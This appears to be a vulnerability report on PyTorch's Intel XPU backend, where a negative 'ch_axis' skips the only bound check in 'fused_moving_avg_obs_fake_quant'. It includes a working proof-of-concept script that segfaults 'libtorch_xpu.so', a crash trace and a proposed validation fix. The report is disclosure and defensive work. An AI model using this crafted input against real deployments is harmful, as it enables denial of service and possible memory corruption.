Bound check in fused_moving_avg_obs_fake_quant_xpu #3963

The Intel XPU implementation of `fused_moving_avg_obs_fake_quant_xpu` validates only the upper bound of `ch_axis`:

```cpp
TORCH_CHECK(
    ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
    "self.dim()");
```

However, in the `per_row_fq` path, the same value is later used as an index into a native `DimVector`:

```cpp
auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;

y = x.permute(res);
```

There is no lower-bound validation such as:

```cpp
ch_axis >= 0
```

or canonicalization through a dimension-wrapping helper such as `maybe_wrap_dim`.

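Because `x.dim()` is never negative, every negative `ch_axis` passes the explicit check (`ch_axis < x.dim()`) and reaches native C++ code in the XPU backend, where it is used as an unchecked index in `res[ch_axis] = 0`. In testing with a large negative value, this causes a deterministic segmentation fault in `libtorch_xpu.so`.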
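The gap between the explicit check and a safe index can be illustrated without a GPU. The following is a minimal pure-Python model, not the backend code: `passes_existing_check` mirrors only the quoted `ch_axis < x.dim()` condition, and `is_safe_index` is a hypothetical name for the condition a raw, unwrapped index would need to satisfy.

```python
# Pure-Python model of the validation gap; no torch or XPU device required.
# Both function names are hypothetical and exist only for illustration.

POC_CH_AXIS = -1250999896764  # value used in the proof of concept


def passes_existing_check(ch_axis: int, ndim: int) -> bool:
    """Mirror of the only explicit check quoted above: ch_axis < x.dim()."""
    return ch_axis < ndim


def is_safe_index(ch_axis: int, ndim: int) -> bool:
    """Condition a raw, unwrapped index into an ndim-element vector must meet."""
    return 0 <= ch_axis < ndim


if __name__ == "__main__":
    ndim = 1  # the PoC tensor has shape (1,)
    for ch_axis in (0, 1, -1, POC_CH_AXIS):
        print(
            f"ch_axis={ch_axis}: "
            f"existing check passes={passes_existing_check(ch_axis, ndim)}, "
            f"safe index={is_safe_index(ch_axis, ndim)}"
        )
```

In this model every negative value, including `-1`, is accepted by the existing check but rejected by the index condition.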

The crash is reachable from public Python APIs in the Intel XPU PyTorch wheel, including `torch.fused_moving_avg_obs_fake_quant`.

**Proof of Concept**

The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.

```bash
set -euo pipefail

mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate

python -m pip install --upgrade pip setuptools wheel

# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu

# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
    print("xpu device:", torch.xpu.get_device_name(0))
PY

# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch

print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)

device = "xpu"

x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)

print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)

out = torch.fused_moving_avg_obs_fake_quant(
    x,
    observer_on,
    fake_quant_on,
    running_min,
    running_max,
    scale,
    zero_point,
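    0.0,             # averaging_const
    0,               # quant_min
    0,               # quant_max
    -1250999896764,  # ch_axis: large negative value that still passes `ch_axis < x.dim()`
    True,            # per_row_fake_quant: selects the path that indexes with ch_axis
    True,            # symmetric_quant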
)

torch.xpu.synchronize()
print("returned:", out, flush=True)
PY

# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
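python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py || status=$?

# With `set -e` active, a failing command would abort the shell before the echo,
# so the exit status is captured explicitly above.
echo "exit code: ${status:-0}"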
```


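The process crashes with a segmentation fault. The Python frames in the captured trace below name a different script (`poc_fused_obs_fake_quant_xpu_fuzz_axes.py`) than the PoC file written above; the native frames in `libtorch_xpu.so` are the relevant part: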

```text
torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:

Fatal Python error: Segmentation fault

Current thread ... [python] (most recent call first):
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>

Current thread's C stack trace:
  ...
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
  ...

Segmentation fault
exit code: 139
```

The same crash was also reproduced through the helper-path operator with:

```python
torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)
```

and through the public operator with:

```python
torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)
```

Both crashed with exit code 139 (128 + 11, i.e. termination by SIGSEGV) and stack frames in `libtorch_xpu.so`.
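When checking several variants like these, it can help to run each one in a child process so that the crash does not take down the driver. The following is a minimal sketch assuming a POSIX system; `run_and_classify` is a hypothetical helper name, and the `128 + signal` conversion follows the shell convention that produces the 139 reported above.

```python
import signal
import subprocess
import sys
from typing import Optional, Sequence, Tuple


def run_and_classify(argv: Sequence[str]) -> Tuple[int, Optional[str]]:
    """Run argv in a child process.

    Returns (shell-style exit code, signal name or None).
    """
    proc = subprocess.run(list(argv), check=False)
    if proc.returncode < 0:
        # On POSIX, subprocess reports death-by-signal as the negated signal number.
        signum = -proc.returncode
        return 128 + signum, signal.Signals(signum).name
    return proc.returncode, None
```

For example, `run_and_classify([sys.executable, "poc_fused_obs_xpu_huge_negative.py"])` would be expected to return `(139, "SIGSEGV")` on an affected build and `(0, None)` if the call returns normally.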


## Impact
A caller who can execute PyTorch code in a process using the Intel XPU backend can crash that process by passing a crafted negative `ch_axis` to the public fake-quantization operator.

Impact:

- Native segmentation fault in `libtorch_xpu.so`
- Process termination / denial of service
- Potential memory corruption due to unchecked native indexing
- Affects public Python API usage, not only internal C++ calls

## Recommended solution
Add explicit lower-bound validation or canonicalization for `ch_axis` before it is used.

For example:

```cpp
TORCH_CHECK(
    ch_axis >= 0 && ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");
```
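Until a backend fix is available, callers could apply the same two options on the Python side before invoking the operator. The sketch below is an illustration under stated assumptions: `check_ch_axis` and `wrap_ch_axis` are hypothetical helpers, not PyTorch APIs, and the wrapping rule assumes the usual PyTorch convention that a dimension in `[-ndim, ndim)` is valid and negative values are offset by `ndim`.

```python
def check_ch_axis(ch_axis: int, ndim: int) -> int:
    """Strict variant: accept only 0 <= ch_axis < ndim, like the TORCH_CHECK above."""
    if not 0 <= ch_axis < ndim:
        raise ValueError(f"ch_axis must be >= 0 and < {ndim}, got {ch_axis}")
    return ch_axis


def wrap_ch_axis(ch_axis: int, ndim: int) -> int:
    """Canonicalizing variant: map -ndim..-1 onto 0..ndim-1, reject everything else."""
    if not -ndim <= ch_axis < ndim:
        raise IndexError(
            f"ch_axis out of range (expected [{-ndim}, {ndim - 1}], got {ch_axis})"
        )
    return ch_axis + ndim if ch_axis < 0 else ch_axis
```

The strict variant matches the proposed `TORCH_CHECK` and rejects all negative values; the wrapping variant would additionally accept `-1` as "last dimension". Either one rejects the PoC value before it reaches native code.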
